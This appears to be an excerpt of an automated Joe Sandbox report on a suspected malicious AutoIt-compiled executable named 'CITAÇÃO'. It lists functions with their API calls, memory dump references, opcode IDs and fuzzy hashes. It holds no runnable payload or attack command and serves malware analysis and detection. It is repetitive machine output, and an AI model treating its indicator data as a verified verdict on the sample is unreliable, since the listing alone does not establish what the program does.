                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                      • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                      • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                      • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                      Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                      • __lock.LIBCMT ref: 00417981
                                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                      • __lock.LIBCMT ref: 004179A2
                                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                      • String ID: KERNEL32.DLL$pI
                                                      • API String ID: 637971194-197072765
                                                      • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                      • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                      • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                      • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                      Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_malloc
                                                      • String ID:
                                                      • API String ID: 1938898002-0
                                                      • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                      • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                      • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                      • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                      Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                      • String ID:
                                                      • API String ID: 3771399671-0
                                                      • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                      • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                      • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                      • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                      Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                      • _memmove.LIBCMT ref: 0044B555
                                                      • _memmove.LIBCMT ref: 0044B578
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                      • String ID:
                                                      • API String ID: 2737351978-0
                                                      • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                      • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                      • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                      • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                      Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                      • __calloc_crt.LIBCMT ref: 00415246
                                                      • __getptd.LIBCMT ref: 00415253
                                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                      • _free.LIBCMT ref: 0041529E
                                                      • __dosmaperr.LIBCMT ref: 004152A9
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                      • String ID:
                                                      • API String ID: 3638380555-0
                                                      • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                      • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                      • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                      • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                      Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Copy$ClearErrorInitLast
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 3207048006-625585964
                                                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                      Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                      • _memmove.LIBCMT ref: 004656CA
                                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                      • WSACleanup.WSOCK32 ref: 00465762
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                      • String ID:
                                                      • API String ID: 2945290962-0
                                                      • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                      • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                      Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                      • String ID:
                                                      • API String ID: 1457242333-0
                                                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                      Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                      • String ID:
                                                      • API String ID: 15295421-0
                                                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                      Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • _wcstok.LIBCMT ref: 004675B2
                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                      • _wcscpy.LIBCMT ref: 00467641
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                      • _wcslen.LIBCMT ref: 00467793
                                                      • _wcslen.LIBCMT ref: 004677BD
                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                      • String ID: X
                                                      • API String ID: 780548581-3081909835
                                                      • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                      • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                      Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                      • CloseFigure.GDI32(?), ref: 0044751F
                                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                      • String ID:
                                                      • API String ID: 4082120231-0
                                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                      Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
